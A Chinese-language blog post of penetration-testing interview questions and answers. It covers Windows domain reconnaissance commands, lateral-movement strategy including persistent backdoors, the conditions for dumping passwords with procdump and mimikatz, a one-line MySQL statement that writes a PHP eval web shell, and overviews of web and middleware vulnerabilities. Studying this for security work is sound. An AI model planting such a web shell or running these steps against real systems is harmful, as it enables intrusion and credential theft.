<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 4.0.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">
  <link rel="alternate" href="/atom.xml" title="ClearLoveの博客" type="application/atom+xml">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css">


<script id="hexo-configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '7.5.0',
    exturl: false,
    sidebar: {"position":"left","display":"post","offset":12,"onmobile":false},
    copycode: {"enable":false,"show_result":false,"style":null},
    back2top: {"enable":true,"sidebar":false,"scrollpercent":false},
    bookmark: {"enable":false,"color":"#222","save":"auto"},
    fancybox: false,
    mediumzoom: false,
    lazyload: false,
    pangu: false,
    algolia: {
      appID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    },
    localsearch: {"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},
    path: 'search.xml',
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    translation: {
      copy_button: '复制',
      copy_success: '复制成功',
      copy_failure: '复制失败'
    },
    sidebarPadding: 40
  };
</script>

  <meta name="description" content="1.获得一台服务器权限后，如何判断当前服务器是否在域中？如果在域中，如何判断当前用户的身份？1.RDS如果服务器远程桌面服务开启，可尝试连接，若在用户和密码栏下还有一个登录到（L）选项，下拉选项如果除了计算机名（此计算机）选项外还有其他选项，则此服务器可能位于域中，且选项名即为域名 2.net time &#x2F;domain执行命令，有三种情况：第一种若存在域会从域控返回时间，并在第一行返回域控及域名；">
<meta name="keywords" content="面试">
<meta property="og:type" content="article">
<meta property="og:title" content="渗透测试面试问题二">
<meta property="og:url" content="http:&#x2F;&#x2F;yoursite.com&#x2F;2019&#x2F;12&#x2F;03&#x2F;%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E9%9D%A2%E8%AF%95%E9%97%AE%E9%A2%98%E4%BA%8C&#x2F;index.html">
<meta property="og:site_name" content="ClearLoveの博客">
<meta property="og:description" content="1.获得一台服务器权限后，如何判断当前服务器是否在域中？如果在域中，如何判断当前用户的身份？1.RDS如果服务器远程桌面服务开启，可尝试连接，若在用户和密码栏下还有一个登录到（L）选项，下拉选项如果除了计算机名（此计算机）选项外还有其他选项，则此服务器可能位于域中，且选项名即为域名 2.net time &#x2F;domain执行命令，有三种情况：第一种若存在域会从域控返回时间，并在第一行返回域控及域名；">
<meta property="og:locale" content="zh-CN">
<meta property="og:updated_time" content="2019-12-18T07:58:28.516Z">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="http://yoursite.com/2019/12/03/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E9%9D%A2%E8%AF%95%E9%97%AE%E9%A2%98%E4%BA%8C/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome: false,
    isPost: true,
    isPage: false,
    isArchive: false
  };
</script>

  <title>渗透测试面试问题二 | ClearLoveの博客</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-meta">

    <div>
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">ClearLoveの博客</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
        <p class="site-subtitle">我们称之为路的，其实不过是彷徨</p>
  </div>

  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>
</div>


<nav class="site-nav">
  
  <ul id="menu" class="menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-fw fa-home"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-fw fa-tags"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-fw fa-th"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-fw fa-archive"></i>归档</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>

</nav>
  <div class="site-search">
    <div class="popup search-popup">
    <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocorrect="off" autocapitalize="none"
           placeholder="搜索..." spellcheck="false"
           type="text" id="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result"></div>

</div>
<div class="search-pop-overlay"></div>

  </div>
</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content">
            

  <div class="posts-expand">
      
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block " lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2019/12/03/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E9%9D%A2%E8%AF%95%E9%97%AE%E9%A2%98%E4%BA%8C/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="魏超">
      <meta itemprop="description" content="胡歌">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="ClearLoveの博客">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          渗透测试面试问题二
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2019-12-03 14:06:51" itemprop="dateCreated datePublished" datetime="2019-12-03T14:06:51+08:00">2019-12-03</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2019-12-18 15:58:28" itemprop="dateModified" datetime="2019-12-18T15:58:28+08:00">2019-12-18</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E9%9D%A2%E8%AF%95/" itemprop="url" rel="index">
                    <span itemprop="name">面试</span>
                  </a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>1.获得一台服务器权限后，如何判断当前服务器是否在域中？如果在域中，如何判断当前用户的身份？</p><pre><code>1.RDS如果服务器远程桌面服务开启，可尝试连接，若在用户和密码栏下还有一个登录到（L）选项，下拉选项如果除了计算机名（此计算机）选项外还有其他选项，则此服务器可能位于域中，且选项名即为域名
2.net time /domain执行命令，有三种情况：第一种若存在域会从域控返回时间，并在第一行返回域控及域名；
  第二种如果当前服务器在域内但当前用户非非域内用户，则返回system error5就表示权限不够
  第三种就是返回找不到域WORKGROUP的域控制器，表示当前网络环境为工作组而不存在域
3.ipconfig /all查看当前网络的DAS，一般在内网的DNS服务器即为域控，很少将DNS与域控分开，除非内网很大存在多域环境
4.systeminfo系统信息当中包含俩项Domain和Logon server，domain即为域名，logon server即为域控，但如果domain显示为WORKGROUP则当前服务器不在域内
5.net config workstation其中工作域显示域名，同样若为WORKGROUP即非域环境，登录域表明当前用户是域用户登录还是本地用户登录
  net group "domain admins" /domain获得域管理员列表
6.net view 查询同一域内机器列表 dsquery user 查询用户
</code></pre><a id="more"></a>

<p>2.简述内网拓展的思路</p>
<pre><code>1.先获取当前服务器的信息，如本机文件，硬编码的密码，读取的hash
2.进一步获取当前网络及域的信息
3.基于已有的信息进行快速内网扩展尝试，如爆破弱口令
4.提权获取更多信息
5.巩固权限，维持访问，持久性后门
6.在横向受阻时尝试更多思路的横向扩展，如钓鱼、社工等</code></pre>
<p>3.简述procdump+mimikatz读取密码的必要条件</p>
<pre><code>1.在相同内核的操作系统的版本上解密
2.管理员权限
3.NT6及以下</code></pre>
<p>4.红蓝对抗的目的是什么？</p>
<pre><code>用来评估企业安全性，有助于找出企业安全中最脆弱的环节，提升企业安全建设</code></pre>
<p>5.常见的恶意代码类型有哪些</p>
<pre><code>常见的恶意代码类型有特洛伊木马、蠕虫、病毒、后门、rootkit、僵尸程序等</code></pre>
<p>6.恶意代码的共同特征</p>
<pre><code>具有恶意目的，自身是计算机程序，通过执行发生作用</code></pre>
<p>7.通过MySQL写入php一句话<br>前提：root权限，web服务器的绝对路径</p>
<pre><code>select "<?php @eval($_POST['pass']);?>" INTO OUTFILE "D:\\WWW\\22.php"</code></pre>
<p>8.除了owasp top10漏洞说下还有哪些web漏洞？</p>
<pre><code>1、xxe漏洞：XXE 漏洞全称 XML 外部实体漏洞（XML External Entity），当应用程序解析 XML 输入时，如果没有禁止外部实体的加载，导致可加载恶意外部文件和代码，就会造成任意文件读取、命令执行、内网端口扫描、攻击内网网站等攻击
2、json劫持：一些 Web 应用会把一些敏感数据以 json 的形式返回到前端，如果仅仅通过 Cookie 来判断请求是否合法，那么就可以利用类似 CSRF 的手段，向目标服务器发送请求，以获得敏感数据。
3、CRLF注入：CRLF注入漏洞，是因为Web应用没有对用户输入做严格验证，导致攻击者可以输入一些恶意字符。攻击者一旦向请求行或首部中的字段注入恶意的CRLF，就能注入一些首部字段或报文主体，并在响应中输出，所以又称为HTTP响应拆分漏洞（HTTP Response Splitting）
4、url重定向，ssi注入等等</code></pre>
<p>9.ssi注入</p>
<pre><code>SSI 注入全称Server-Side Includes Injection，即服务端包含注入。SSI 是类似于 CGI，用于动态页面的指令。SSI 注入允许远程在 Web 应用中注入脚本来执行代码
漏洞挖掘思路
1.从业务场景来Fuzz，比如获取IP、定位、时间等
2.识别页面是否包含.stm,.shtm和.shtml后缀
3.google dork：'inurl:bin/cklb'</code></pre>
<p>10.列举常见中间件漏洞</p>
<pre><code>（一） IIS
1、PUT漏洞
2、短文件名猜解
3、远程代码执行
4、解析漏洞
（二） Apache
1、解析漏洞
2、目录遍历
（三） Nginx
1、文件解析
2、目录遍历
3、CRLF注入
4、目录穿越
（四）Tomcat
1、远程代码执行
2、war后门文件部署
（五）jBoss
1、反序列化漏洞
2、war后门文件部署
（六）WebLogic
1、反序列化漏洞
2、SSRF
3、任意文件上传
4、war后门文件部署
（七）其它中间件相关漏洞
1、FastCGI未授权访问、任意命令执行
2、PHPCGI远程代码执行</code></pre>
<p>11.列举常见中间件漏洞利用过程</p>
<pre><code>https://www.freebuf.com/articles/web/192063.html</code></pre>
<p>12.列举常见的几款编辑器漏洞</p>
<pre><code>fck编辑器
https://blog.csdn.net/bulebirds/article/details/24474535
Eweb编辑器
https://wenku.baidu.com/view/cde21896866fb84ae55c8d1c.html
ck编辑器
</code></pre>
<p>13.列举出常见的几款cms漏洞</p>
<pre><code>https://cloud.tencent.com/document/product/296/17342
https://www.cnblogs.com/AtesetEnginner/p/11149374.html</code></pre>
<p>14.护网期间如何溯源web攻击事件</p>
<pre><code>https://www.freebuf.com/articles/network/202168.html
https://www.freebuf.com/articles/network/203494.html
https://www.cnblogs.com/p1rate/p/10763052.html</code></pre>
<p>15.app逆向</p>
<pre><code>https://www.freebuf.com/articles/terminal/169110.html</code></pre>
    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E9%9D%A2%E8%AF%95/" rel="tag"># 面试</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-next post-nav-item">
                <a href="/2019/12/02/sql-server%E6%8F%90%E6%9D%83/" rel="next" title="sql server提权相关命令">
                  <i class="fa fa-chevron-left"></i> sql server提权相关命令
                </a>
            </div>

            <span class="post-nav-divider"></span>

            <div class="post-nav-prev post-nav-item">
                <a href="/2020/01/09/phpMYAdmin%E6%8F%90%E6%9D%83/" rel="prev" title="phpMYAdmin提权">
                  phpMYAdmin提权 <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
      </footer>
    
  </article>
  
  
  

  </div>


          </div>
          

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="魏超"
      src="/images/avatar.gif">
  <p class="site-author-name" itemprop="name">魏超</p>
  <div class="site-description" itemprop="description">胡歌</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">17</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">5</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">12</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="feed-link motion-element">
    <a href="/atom.xml" rel="alternate">
      <i class="fa fa-rss"></i>RSS
    </a>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">魏超</span>
</div>
  <!--<div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> 强力驱动 v4.0.0
  </div>
  <span class="post-meta-divider">|</span>
  <div class="theme-info">主题 – <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> v7.5.0
  </div>
--!>

        












        
      </div>
    </footer>
  </div>

  
  
  <script color='0,0,255' opacity='0.5' zIndex='-1' count='99' src="/lib/canvas-nest/canvas-nest.min.js"></script>
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>
<script src="/js/utils.js"></script><script src="/js/motion.js"></script>
<script src="/js/schemes/pisces.js"></script>
<script src="/js/next-boot.js"></script>



  




  <script src="/js/local-search.js"></script>













  

  

<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body>
</html>
<script type="text/javascript" src="/js/clicklove.js"></script>
